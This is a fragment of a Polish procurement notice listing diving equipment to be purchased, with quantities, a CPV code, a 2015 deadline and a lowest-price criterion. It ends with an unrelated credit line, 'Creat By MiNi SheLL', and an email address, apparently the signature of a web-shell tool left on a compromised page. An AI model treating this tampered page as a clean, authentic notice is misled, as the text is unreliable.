<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> BŁYSKACZ NURKOWY STROBOSKOPOWY	szt.	10
BOJKA ZNAKUJĄCA 	szt.	5
JACKET NURKOWY 	kpl.	5
JACKET NURKOWY TYPU SKRZYDŁO	szt.	2
KOŁOWROTEK DO BOI DEKOMPRES.	szt.	4
LATARKA NURKOWA	szt.	2
PŁETWY DO NURKOWANIA	Para	16
PŁETWY TECHNICZNE DO NURKOWANIA	Para	2
SZPULKA Z LINKĄ DO NURKOWANIA	szt.	2
ZESTAW BUTLI NURKOWYCH TWIN	kpl.	2.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 37.40.00.00-2.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.09.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com